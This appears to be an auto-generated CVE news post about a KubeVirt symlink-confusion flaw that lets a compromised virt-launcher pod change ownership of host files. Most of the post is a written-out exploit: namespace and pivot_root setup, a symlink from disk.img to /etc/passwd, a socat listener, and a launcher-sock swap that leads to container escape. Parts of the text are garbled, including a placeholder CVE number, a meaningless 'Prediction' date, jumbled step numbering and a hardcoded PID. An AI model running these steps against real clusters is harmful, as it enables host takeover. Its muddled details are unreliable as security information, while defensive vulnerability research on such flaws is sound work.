Kubevirt, Symlink Confusion, CVE-2024-XXXX (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The vulnerability exists in the `virt-handler` component of Kubevirt. When a VirtualMachineInstance (VMI) is created or updated, `virt-handler` uses a socket file (launcher-sock) located within the `virt-launcher` pod to determine the pod’s root filesystem mount point. The flaw is that `virt-handler` does not check if this `launcher-sock` is a symbolic link. An attacker with control over the `virt-launcher` pod’s filesystem can replace this socket with a symlink pointing to a malicious socket in a different mount namespace. This tricks the `Detect` function and subsequent `MountRoot()` call into misidentifying the root filesystem. When `hostDiskCreator` later runs to initialize disk images, it operates on files relative to this incorrect root, allowing an attacker to change the ownership of any host file to the `virt-launcher` user (UID 107) by manipulating a second symlink for a Persistent Volume Claim (PVC) named disk.img.

DailyCVE Form:

Platform: Kubevirt
Version: < v1.2.0
Vulnerability: Symlink Confusion
Severity: Critical
Date: 2024-05-27

Prediction: 2024-07-15

What Undercode Say:

Enable unprivileged user namespaces (prerequisite)
sysctl -w kernel.unprivileged_userns_clone=1
Create isolated namespace environment
unshare --user --map-root-user --mount sh
Pivot root and set up symlinks
pivot_root . hostfs_root
ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img
socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -
Trigger the race condition
p=$(pgrep -af "/usr/bin/virt-launcher" | grep -v virt-launcher-monitor | awk '{print $1}')
ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock

How Exploit:

1. Gain filesystem access in `virt-launcher` pod.

2. Create malicious mount namespace with pivoted root.

  1. Set up symlink for PVC `disk.img` pointing to target host file.
  2. Start a socket listener on a controlled path.
  3. Exploit race condition during VMI creation by replacing `launcher-sock` with a symlink to the malicious socket.
    6. `virt-handler` connects to malicious socket, misidentifies root mount.
  4. Host file ownership is changed to UID 107.

Protection from this CVE:

Patch to v1.2.0 or later.

Restrict pod capabilities.

Enforce seccomp profiles.

Control userns_clone sysctl.

Impact:

Host File Tampering

Data Confidentiality Loss

Container Escape

Host Integrity Compromise

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top